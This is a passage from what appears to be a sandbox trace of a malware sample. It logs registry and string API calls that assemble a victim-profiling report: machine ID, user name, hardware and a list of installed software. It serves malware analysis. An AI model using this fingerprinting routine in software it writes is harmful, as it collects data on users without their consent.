03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 " [0175.944] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ", lpString2="9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161" [0175.944] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n" [0175.944] RegCloseKey (hKey=0x354) returned 0x0 [0175.944] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x35, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.944] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}") returned 90 [0175.944] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.944] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x197fd4*=0x3e) returned 0x0 [0175.945] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned 61 [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF 